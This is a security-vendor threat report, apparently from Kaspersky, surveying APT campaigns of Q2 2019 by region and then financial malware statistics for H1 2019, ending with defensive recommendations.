Symantec has also been tracking targeted attacks in a series of campaigns against governments and international organizations across the globe over the past 18 months. The attacks have featured a rapidly evolving toolset and, in one notable instance, the apparent hijacking of infrastructure belonging to OilRig. They have uncovered evidence that the Waterbug APT group (aka Turla, Snake, Uroburos, Venomous Bear and KRYPTON) has conducted a hostile takeover of an attack platform belonging to OilRig (aka Crambus). Researchers at Symantec suspect that Turla used the hijacked network to attack a Middle Eastern government that OilRig had already penetrated. This is not the first time that we have seen this type of activity. Clearly, operations of this kind make the job of attribution more difficult.

The international community continues to focus on the activity of Russian-speaking threat actors. Over the last 18 months, the UK has shared information on attacks attributed to Russian hackers with 16 NATO allies, including attacks on critical national infrastructure and attempts to compromise central government networks. In his former capacity as UK foreign secretary, Jeremy Hunt, recently urged nations to band together to create a deterrent for state-sponsored hackers. As part of this push, the UK and its intelligence partners have been slowly moving towards a ‘name and shame’ approach when dealing with cyberattacks. The use of the ‘court of public opinion’ in response to cyberattacks is a trend that we highlighted in our predictions for 2019. To help this new strategy the EU recently passed new laws that will make it possible for EU member states to impose economic sanctions against foreign hackers.

Researchers at the Microstep Intelligence Bureau have published a report on targeted attacks on the Ukrainian government that they attribute to the Gamaredon threat actor. Recently, the group launched attacks on a number of state organizations in Ukraine using Pterodo, malware used exclusively by this group. Since February, the attackers have deployed a large number of dynamic domain names and newly registered domain names believed to be used to launch targeted attacks against elections in Ukraine.

Chinese-speaking activity

We found an active campaign by a Chinese APT group we call SixLittleMonkeys that uses a new version of the Microcin Trojan and a RAT that we call HawkEye as a last stager. The campaign mainly targets government bodies in Central Asia. For persistence, the operators use .DLL search order hijacking. This consists of using a custom decryptor with a system library name (e.g., version.dll or api-ms-win-core-fibers-l1-1-1.dll) in directories, along with the legitimate applications that load these libraries into memory. Among other legitimate applications, the threat actor uses the Google updater, GoogleCrashHandler.exe, for .DLL hijacking. Custom encryptors protect the next stagers from detection on disk and from automated analysis, using the same encryption keys in different samples. For secure TLS communication with its C2, the malware uses the Secure Channel (Schannel) Windows security package.

ESET discovered that the attackers behind the Plead malware have been distributing it using compromised routers and man-in-the-middle (MITM) attacks in April. Researchers have detected this activity in Taiwan, where the Plead malware has been most actively deployed. Trend Micro has previously reported the use of this malware in targeted attacks by the BlackTech group, primarily focused on cyber-espionage in Asia. ESET telemetry has revealed multiple attempts to deploy it.

LuckyMouse activity detected by Palo Alto involved the attackers installing web shells on SharePoint servers to compromise government organizations in the Middle East, probably exploiting CVE-2019-0604, a remote code execution vulnerability used to compromise the server and eventually install a web shell. The actors uploaded a variety of tools that they used to perform additional activities on the compromised network, such as dumping credentials, as well as locating and pivoting to additional systems on the network. Of particular note is the group’s use of tools to identify systems vulnerable to CVE-2017-0144, the vulnerability exploited by EternalBlue and used in the 2017 WannaCry attacks. This activity appears to be related to campaigns exploiting CVE-2019-0604 mentioned in recent security alerts from the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security.

Last year, a number of Chinese hackers allegedly linked to the Chinese government were indicted in the US. In May, the US Department of Justice indicted a Chinese national for a series of computer intrusions, including the 2015 data breach of health insurance company Anthem which affected more than 78 million people.

Middle East

The last three months have been very interesting for this region, especially considering the multiple leaks of alleged Iranian activity that were published within just a few weeks of each other. Even more interesting is the possibility that one of the leaks may have been part of a disinformation campaign carried out with the help of the Sofacy/Hades actor.

In March, someone going by the handle Dookhtegan or Lab_dookhtegan started posting messages on Twitter using the hashtag #apt34. Several files were shared via Telegram that supposedly belonged to the OilRig threat actor. They included logins and passwords of several alleged hacking victims, tools, infrastructure details potentially related to different intrusions, the résumés of the alleged attackers and a list of web shells – apparently relating to the period 2014-18.

The targeting and TTPs are consistent with this threat actor, but it was impossible to confirm the origins of the tools included in the dump. Assuming that the data in the dump is accurate, it also shows the global reach of the OilRig group, which has generally been thought to operate primarily in the Middle East.

On April 22, an entity going by the alias Bl4ck_B0X created a Telegram channel named GreenLeakers. The purpose of the channel, as stated by its creator, was to publish information about the members of the MuddyWater APT group, “along with information about their mother and spouse and etc.”, for free. In addition to this free information, the Bl4ck_B0X actor(s) also hinted that “highly confidential” information related to MuddyWater would be put up for sale.

On April 27, three screenshots were posted in the GreenLeakers Telegram channel, containing alleged screenshots from a MuddyWater C2 server. On May 1, the channel was closed to the public and its status changed to private. This was before Bl4ck_B0X had the chance to publish the promised information on the MuddyWater group. The reason for the closure is still unclear.

Finally, a website named Hidden Reality published leaks allegedly related to an entity named the Iranian RANA institute. It was the third leak in two months disclosing details of alleged Iranian threat actors and groups.

Interestingly, this leak differed from the others by employing a website that allows anyone to browse the leaked documents. It also relies on Telegram and Twitter profiles to post messages related to Iranian CNO capabilities. The Hidden Reality website contains internal documents, chat messages and other data related to the RANA institute’s CNO (Computer Network Operations) capabilities, as well as information about victims. Previous leaks were focused more on tools, source code and individual actor profiles.

Close analysis of the materials, the infrastructure and the dedicated website used by the leakers, provided clues that led us to believe Sofacy/Hades may be connected to these leaks.

There was also other Muddywater activity unrelated to the leak, as well as discoveries linked to previous activity by the group, such as ClearSky’s discovery of two domains hacked by MuddyWater at the end of 2018 to host the code of its POWERSTATS malware.

In April, Cisco Talos published its analysis of the BlackWater campaign, related to MuddyWater activity. The campaign shows how the attackers added three distinct steps to their operations, allowing them to bypass certain security controls to evade detection: an obfuscated VBA script to establish persistence as a registry key, a PowerShell stager and FruityC2 agent script, and an open source framework on GitHub to further enumerate the host machine. This could allow the attackers to monitor web logs and determine whether someone outside the campaign has made a request to their server in an attempt to investigate the activity. Once the enumeration commands run, the agent communicates with a different C2 and sends back data in the URL field. Trend Micro also reported MuddyWater’s use of a new multi-stage PowerShell-based backdoor called POWERSTATS v3.

We published a private report about four Android malware families and their use of false flag techniques, among other things. One of the campaigns sent spear-phishing emails to a university in Jordan and the Turkish government, using compromised legitimate accounts to trick victims into installing malware.

Regarding other groups, we discovered new activity related to ZooPark, a cyber-espionage threat actor that has focused mainly on stealing data from Android devices. Our new findings include new malicious samples and additional infrastructure that has been deployed since 2016. This also led to us discovering Windows malware implants deployed by the same threat actor. The additional indicators we found shed some light on the targets of past campaigns, including Iranian Kurds – mainly political dissidents and activists.

Recorded Future published an analysis of the infrastructure built by APT33 (aka Elfin) to target Saudi organizations. Following the exposure of a wide range of their infrastructure and operations by Symantec in March, researchers at Recorded Future discovered that APT33, or closely aligned actors, reacted by either parking or reassigning some of their domain infrastructure. The fact that this activity was executed just a day or so after the report went live suggests the Iranian threat actors are acutely aware of the media coverage of their activities and are resourceful enough to be able to react in a quick manner. Since then, the attackers have continued to use a large swath of operational infrastructure, well in excess of 1,200 domains, with many observed communicating with 19 different commodity RAT implants. An interesting development appears to be their increased preference for njRAT, with over half of the observed suspected APT33 infrastructure being linked to njRAT deployment.

On a more political level, there were several news stories covering Iranian activity.

A group connected to the Iranian Revolutionary Guard has been blamed for a wave of cyber-attacks against UK national infrastructure, including the Post Office, local government networks, private companies and banks. Personal data of thousands of employees were stolen. It is believed that the same group was also responsible for the attack on the UK parliamentary network in 2017. The UK NCSC (National Cyber Security Centre) is providing assistance to affected organizations.

Microsoft recently obtained a court order in the US to seize control of 99 websites used by the Iranian hacking group APT35 (aka Phosphorus and Charming Kitten). The threat actor used spoofed websites, including those of Microsoft and Yahoo, to conduct cyberattacks against businesses, government agencies, journalists and activists who focus on Iran. The sinkholing of these sites will force the group to recreate part of its infrastructure.

The US Cybersecurity and Infrastructure Security Agency (CISA) has reported an increase in cyberattacks by Iranian actors or proxies, targeting US industries and government agencies using destructive wiper tools. The statement was posted on Twitter by CISA director, Chris Krebs.

Southeast Asia and Korean Peninsula

This quarter we detected a lot of Korean-related activity. However, for the rest of the Southeast Asian region there has not been that much activity, especially when compared to earlier periods.

Early in Q2, we identified an interesting Lazarus attack targeting a mobile gaming company in South Korea that we believe was aimed at stealing application source code. It’s clear that Lazarus keeps updating its tools very quickly. Meanwhile, BlueNoroff, the Lazarus sub-group that typically targets financial institutions, targeted a bank in Central Asia and a crypto-currency business in China.

In a recent campaign, we observed ScarCruft using a multi-stage binary to infect several victims and ultimately install a final payload known as ROKRAT – a cloud service-based backdoor. ScarCruft is a highly skilled APT group, historically using geo-political issues to target the Korean Peninsula. We found several victims worldwide identified as companies and individuals with ties to North Korea, as well as a diplomatic agency. Interestingly, we observed that ScarCruft continues to adopt publicly available exploit code in its tools. We also found an interesting overlap in a Russian-based victim targeted both by ScarCruft and DarkHotel – not the first time that we have seen such an overlap.

ESET recently analyzed a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal. This backdoor shares its features with a previous Mac OS variant, but the structure has changed and detection is now much harder. Researchers were unable to find the dropper associated with this sample, so they could not identify the initial compromise vector.

The US Department of Homeland Security (DHS) has reported Trojan variants, identified as HOPLIGHT, being used by the North Korean government. The report includes an analysis of nine malicious executable files. Seven of them are proxy applications that mask traffic between the malware and the remote operators. The proxies have the ability to generate fake TLS handshake sessions using valid public SSL certificates, disguising network connections with remote malicious actors. One file contains a public SSL certificate and the payload of the file appears to be encoded with a password or key. The remaining file does not contain any of the public SSL certificates, but attempts outbound connections and drops four files: the dropped files primarily contain IP addresses and SSL certificates.

In June, we came across an unusual set of samples used to target diplomatic, government and military organizations in countries in South and Southeast Asia. The threat actor behind the campaign, which we believe to be the PLATINUM APT group, uses an elaborate, previously unseen, steganographic technique to conceal communication. A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and this campaign provides proof: the actors used two interesting steganography techniques in this APT. It’s also interesting that the attackers decided to implement the utilities they need as one huge set – an example of the framework-based architecture that is becoming more and more popular.

Other interesting discoveries

On May 14, Microsoft released fixes for a critical Remote Code Execution vulnerability (CVE-2019-0708) in Remote Desktop Services (formerly known as Terminal Services) that affects some older versions of Windows: Windows 7, Windows Server 2008 R2, Windows Server 2008 and some unsupported versions of Windows – including Windows 2003 and Windows XP. Details on how to mitigate this vulnerability are available in our private report ‘Analysis and detection guidance for CVE-2019-0708’. The Remote Desktop Protocol (RDP) itself is not vulnerable. This vulnerability is pre-authentication and requires no user interaction. In other words, the vulnerability is ‘wormable’, meaning that any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way that WannaCry spread. Microsoft has not observed exploitation of this vulnerability, but believes it is highly likely that malicious actors will write an exploit for it.

Early in June, researchers at Malwarebytes Labs observed a number of compromises on Amazon CloudFront, a Content Delivery Network (CDN), where hosted JavaScript libraries were tampered with and injected with web skimmers. Although attacks that involve CDNs usually affect a large number of web properties at once via their supply chain, this isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or link to code developed specifically for them and hosted on a custom AWS S3 bucket. Without properly validating externally loaded content, these sites are exposing their users to various threats, including some that pilfer credit card data. After analyzing these breaches, researchers found that they are a continuation of a campaign from Magecart threat actors attempting to cast a wide net around many different CDNs. CDNs are widely used because they provide great benefits to website owners, including optimizing load times and cost, as well as helping with all sorts of data analytics. The sites they identified had nothing in common other than the fact they were all using their own custom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN repository would be themselves.

Dragos has reported that XENOTIME, the APT group behind the TRISIS (aka TRITON and HatMan) attack on a Saudi Arabian petro-chemical facility in 2017, has expanded its focus beyond the oil and gas industries. Researchers have recently seen the group probing the networks of electric utility organizations in the US and elsewhere – perhaps as a precursor to a dangerous attack on critical infrastructure that could potentially cause physical damage or loss of life. Dragos first noticed the shift in targeting in late 2018; and the attacks have continued into 2019.

We recently reported on the latest versions of FinSpy for Android and iOS, developed in mid-2018. This surveillance software is sold to government and law enforcement organizations all over the world, who use it to collect a variety of private user information on various platforms. WikiLeaks first discovered the implants for desktop devices in 2011 and mobile implants were discovered in 2012. Since then Kaspersky has continuously monitored the development of this malware and the emergence of new versions in the wild. Mobile implants for iOS and Android have almost the same functionality. They are capable of collecting personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges on an unrooted device by abusing known vulnerabilities. It would seem that the iOS solution doesn’t provide infection exploits for its customers: the product seems to be fine-tuned to clean traces of publicly available jailbreaking tools. This might imply that physical access to the victim’s device is required in cases where devices are not already jailbroken. The latest version includes multiple features that we haven’t observed before. During our recent research, we detected up-to-date versions of these implants in the wild in almost 20 countries, but the size of the customer base would suggest that the real number of victims may be much higher.

Final thoughts

APT activity in the Middle East has been particularly interesting this quarter, not least because of the leaks related to alleged Iranian activity. This is especially interesting because one of those leaks might have been part of a disinformation campaign carried out with the help of the Sofacy/Hades threat actor.

In contrast to earlier periods, when Southeast Asia was the most active region for APTs, the activities we detected this quarter were mainly Korean-related. For the rest of the region, it was a much quieter quarter.

Across all regions, geo-politics remains the principal driver of APT activity.

It is also clear from our FinSpy research that there is a high demand for ‘commercial’ malware from governments and law enforcement agencies.

One of the most noteworthy aspects of the APT threat landscape we reported this quarter was our discovery of TajMahal, a previously unknown and technically sophisticated APT framework that has been in development for at least five years. This full-blown spying framework includes up to 80 malicious modules stored in its encrypted Virtual File System – one of the highest numbers of plugins we’ve ever seen for an APT toolset.

As always, we would note that our reports are the product of our visibility into the threat landscape. However, it needs to be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

Financial threats in H1 2019

31 Červenec, 2019 - 17:00

Introduction and methodology

Financial cyberthreats are malicious programs that attack users of online banking services, electronic money, cryptocurrency and other similar services, as well as threats aimed at gaining access to financial organizations and their infrastructure. Kaspersky experts regularly analyze the statistics that the company’s products anonymously send to the cloud infrastructure of the Kaspersky Security Network (KSN) in case users agree to transfer such data. In order to study the threat landscape of the financial sector, the researchers analyzed cases of malicious activity on the devices of private users of Kaspersky’s security solutions. Statistics on corporate users were collected from corporate security solutions, after the customers agreed to share their data with Kaspersky. The information obtainedwas compared with data fromthe same period in 2018, to track the trends in the development of malware. users We looked at quarterly results in order to compare statisitics for PC users, as we were able to divide the data into two catergories – corporate and private users. Traditionally, the second and the third quarter might differ from the first and the fourth as these people often go on vaction and there less of corporate financial activity in these periods. The most active malware families were then analyzed.

Main findings:
  • In the first half of 2019, more than 430,000 unique users were attacked by financial threats – seven percent more than during the same period in 2018
  • The number of financial attacks in the first half of 2019 was 10,493,792 – 93% more than in the first and second quarter of 2018
  • The number of malware samples from financial threats received by Kaspersky in the first half of 2019 was 5,242,462 – 74% more than the previous year
  • The countries with the largest share of users attacked by financial malware were China and Belarus (2.3% each). In second and third place were Venezuela (2.2%) and South Korea (2.1%), respectively
  • During the first half of 2019, Kaspersky blocked more than 339,000 attempts to switch users to phishing pages pretending to be big banks
  • 438,709 unique users encountered mobile financial threats in the first half of 2019 – 23% less than in the same period in 2018
  • The number of mobile financial attacks in the first half of 2019 was 3,730,378 – 107% more than in the first half of 2018
Threats to PC: banking malware and phishing

In the first half of 2019, Kaspersky experts detected 431,088 unique users[1] attacked by banking Trojans aimed at stealing funds and financial data, which was a seven percent increase compared to the same period in 2018 (400,830).


The number of unique attacked users, Q1 2018 – Q2 2019


The number of unique attacked users by user type, Q1 2018-Q2 2019

At the same time, the share of users attacked through corporate devices in the first half of 2019 reached 30.9%, while in the first half of 2018, this figure was half as much (15.3%).

Researchers also noticed an increased number of malicious files in 2019. Thus, in the first quarter, the number of samples in the Kaspersky collection more than doubled, compared to the same period in 2018, reaching 335,000. But in the second quarter, growth slowed down.


Number of samples of new financial malware, Q1 2018 – Q2 2019

Attacks have also become more frequent: the number of attempts to infect a device detected by Kaspersky’s protective solutions in both the first and second quarter of 2019 exceeded the corresponding figures of 2018 by 51% and 27%, respectively.


The number of attempts to infect financial malware, Q1 2018 – Q2 2019

For a more complete analysis of the threat landscape, experts compiled a list of the most active banking Trojans in the first and second quarters of 2019, positioning them by the number of unique users that these threats attacked. 39.50% of corporate users were attacked by the RTM Trojan, one of the most common malware samples of the past year. In second place was Emotet (14.90%), capable of loading malware onto an infected device. For example, the Trickster Trojan, which can be installed on the victim’s computer, which is in third place in our ranking (12.30%).

Corporate users Private users Trojan-Banker.Win32.RTM 39.50% Trojan-Banker.Win32.Zbot 25.50% Trojan-Banker.Win32.Emotet 14.90% Trojan-Banker.Win32.RTM 24.50% Trojan-Banker.Win32.Trickster 12.30% Trojan-Banker.Win32.Emotet 6.40%

Top 3 types of financial malware found in the first half of 2019

This is different for private users: the above-mentioned RTM and Emotet occupy second and third places with 24.5% and 6.4%, respectively, and in the first place is Zbot – one of the most common Trojans of 2018. Such malware is usually spread with the help of email campaigns or through phishing sites. In the first half of 2019, Kaspersky prevented more than 339,000 attempts to switch users to phishing pages that were designed as legitimate pages of large banks.

Geography

The top 10 countries with the largest share of users attacked by financial malware do not have geopolitical similarities and are not situated in a specific region. In the first place were China and Belarus (2.3%), followed by Venezuela (2.2%) and South Korea (2.1%).

Country* %** China     2.30 Belorussia     2.30 Venezuela     2.20 South Korea     2.10 Serbia     1.80 Greece     1.70 Cameroon     1.60 Indonesia     1.50 Pakistan     1.50 Russia     1.40

* Countries where the number of users of Kaspersky’s security solutions is relatively small (less than 10,000) are excluded from the ranking.
** The share of unique users attacked in relation to all users of Kaspersky ‘s security solutions in the country.

Top 10 countries by the proportion of unique users attacked by financial malware

Threats to mobile platforms

In the first half of 2019, attackers actively used the names of the largest financial services and banking organizations to attack mobile platform users. Researchers found 438,709 unique users attacked by mobile Trojan bankers. For comparison, in the first half of 2018, the number of attacked users was 569,057, a decrease of 23%.


The number of users attacked by financial threats for mobile platforms, H1 2018 – H1 2019

Similar cases can be seen in the table representing the total number of attacks over this period.


The number of attacks of financial threats for mobile platforms, H1 2018 – H1 2019

The number of attacked users and detected attacks peaked rapidly in the second half of 2018. 1,333,410 users were attacked and and there were 10,256,935 attacks. The reason behind this is the rapid growth in activity of the Asacub banker trojan and an increase in the distribution of the Svpeng banker trojan. As it can be seen from Kaspersky’s records during this period, the number of Asacub attacks peaked in in the second half of 2018, multiplying almost a thousand times, comparing to figures of H1 2018. However, the epidemics then calmed in H1 2019.

H1 2018 h2 2018 h1 2019 Trojan-Banker.AndroidOS.Asacub.a 476 431036 69704 Trojan-Banker.AndroidOS.Asacub.snt 182 341726 92483 Trojan-Banker.AndroidOS.Asacub.ce 0 196479 34211 Trojan-Banker.AndroidOS.Asacub.ci 0 194564 3101 Trojan-Banker.AndroidOS.Asacub.cg 0 152011 2893 Trojan-Banker.AndroidOS.Svpeng.q 84268 126316 35400

The influence of Asacub on the overall statistics can be clearly seen in the graph below.


The number of users attacked by Asacub banking trojan, H1 2018 – H1 2019

The overall number of detected malicious files (installation packages) has decreased since the first half of 2018: in the first half of 2019, there were 43% fewer. At the same time, researchers recorded an increase in the number of attacks, rising by 107%.


Number of malicious files for mobile platforms, H1 2018 – H1 2019

The top-five malware families for mobile platforms in the first half of 2019 is almost identical to the overall rating for 2018.

More than half (51),39% of users faced representatives of the Asacub malware, which recorded powerful growth last year. At the peak of its “popularity” this malicious software attacked up to 40,000 users per day. isThe was partly due to the Trojan distribution method; when it reached the victim’s phone, it sent messages to all its contacts with links to download the installation file.

The Asacub family is followed by the Agent family (16.75%). This is the general verdict for banking trojans that cannot be classified into particular families or are represented by only one sample.

14.91% were attacked by the Svpeng Trojan. Like most banking Trojans, Svpeng slips a false login page to the user, and then intercepts the data entered in the login and password fields.

Family %* Trojan-Banker.AndroidOS.Asacub 51.39 Trojan-Banker.AndroidOS.Agent 16.75 Trojan-Banker.AndroidOS.Svpeng 14.91 Trojan-Banker.AndroidOS.Faketoken 7.56 Trojan-Banker.AndroidOS.Hqwar 2.56

* The share of users attacked by a certain family of malicious programs from all users attacked by financial threats

TOP 5 financial malware families, H1 2019

The Anubis Trojan is particularly interesting: it intercepts data for access to services of large financial organizations and two-factor authentication data (scode from SMS), which encrypts the data in order to extort money. It is one of the few banking Trojans that spreads via instant e messaging apps, such as WhatsApp, and sends a link to the victim’s contact list. Anubis is known to be one of the first threats in which comments on the YouTube platform were used as a command centre – a platform from which attackers manage malware. This usually works in the following way: malware writers create a video on Youtube and write a description or comment containing a command. Malware then connects to this video page, reads the description or comment and executes the command.

This happened in this way because Youtube is a public resource, so when one analyzes an infected user’s traffic, and sees a YouTube link in the list of accessed pages, even a cybersecurity expert may not consider it suspicious. They could even be unaware that those requests were not sent by the user but instead by malware. Moreover, such communication can not be blocked as there the user could be blocked from accessing the entire YouTube website.

Conclusion and recommendations

In the first half of 2019, researchers recorded an increase in the number of users attacked by financial malware for personal computers compared to the same period in 2018, and a decrease in the activity of cybercriminals targeting mobile platforms.

The main families of malware that attacked users in 2019 remained the same: for mobile platforms, the leaders turned out to be the Asacub family, and for PC RTM (for corporate users) and Zbot (for private users) trojans were the most prolific.

It was not possible to single out specific geographic locations where financial threats are most active, since they turned out to be approximately equal for users in all regions.

To protect against financial threats, Kaspersky recommends that users:
  • Install applications only from trusted sources – such as official stores;
  • Check what access rights and permissions the application requests – if they do not correspond to what the program is designed to do then it should be questioned;
  • Do not follow links in spam messages and do not open documents attached to them;
  • Use a reliable security solution, including on mobile devices.
To protect your business from financial malware, Kaspersky security specialists advise:
  • Introducing cybersecurity awareness training for your employees, particularly those who are responsible for accounting, to teach them how to distinguish phishing attacks: do not open attachments or click on links from unknown or suspicious addresses
  • Installing the latest updates and patches for all of the software you use
  • Forbidding the installation of programs from unknown sources
  • For endpoint level detection, investigation and timely remediation of incidents, implement an EDR solution such as Kaspersky Endpoint Detection and Response. It can even catch unknown banking malware
  • Integrating Threat Intelligence into your SIEM and security controls in order to access the most relevant and up-to-date threat data